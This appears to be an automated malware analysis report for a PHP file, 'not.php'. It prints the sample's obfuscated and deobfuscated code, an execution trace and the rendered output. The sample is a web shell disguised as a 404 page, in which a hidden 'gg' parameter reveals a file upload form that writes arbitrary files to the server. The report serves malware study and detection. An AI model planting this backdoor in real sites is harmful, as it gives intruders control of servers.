PHP Malware Analysis

not.php

md5: 1c948875d7f6a9a117360edb2f4f3283

Jump to: 

Screenshot
Attributes
Encoding

Files

Input

Title

Deobfuscated PHP code
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL <?php 
echo $_SERVER['REQUEST_URI'];
?> was not found on this server.</p>
</body></html>
<?php 
if (isset($_GET["gg"])) {
    echo "\"<form method='POST' enctype='multipart/form-data'><input type='file'name='f' /><input type='submit' value='up' /></form>\"";
    @copy($_FILES['f']['tmp_name'], $_FILES['f']['name']);
    echo "<a href=" . $_FILES['f']['name'] . ">" . $_FILES['f']['name'] . "</a>";
}
Execution traces
data/traces/1c948875d7f6a9a117360edb2f4f3283_trace-1676250029.6923.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 23:00:55.590093]
1	0	1	0.000128	393512
1	3	0	0.000190	396600	{main}	1		/var/www/html/uploads/not.php	0	0
1	3	1	0.000207	396600
			0.000233	314224
TRACE END   [2023-02-12 23:00:55.590224]


Generated HTML code
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /not.php was not found on this server.</p>

</body></html>
Original PHP code
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL <?php echo $_SERVER['REQUEST_URI'];
 ?> was not found on this server.</p>
</body></html>
<?php
if(isset($_GET["gg"])){
 echo(base64_decode("Ijxmb3"."JtIG1ldGhvZD0n"."UE9TVCcgZW5jdHlw"."ZT0nbXVsdGlwYXJ0L2Z"."vcm0tZGF0YSc+PGl"."ucHV0IHR5cGU9J2ZpbGUnbmF"."tZT0nZicgLz48aW5wdXQgdHlwZT0nc3V"."ibWl0JyB2YWx1ZT0ndXAnIC8+PC9mb3JtPiI="));
 @copy($_FILES['f']['tmp_name'],$_FILES['f']['name']);
 echo("<a href=".$_FILES['f']['name'].">".$_FILES['f']['name']."</a>");
}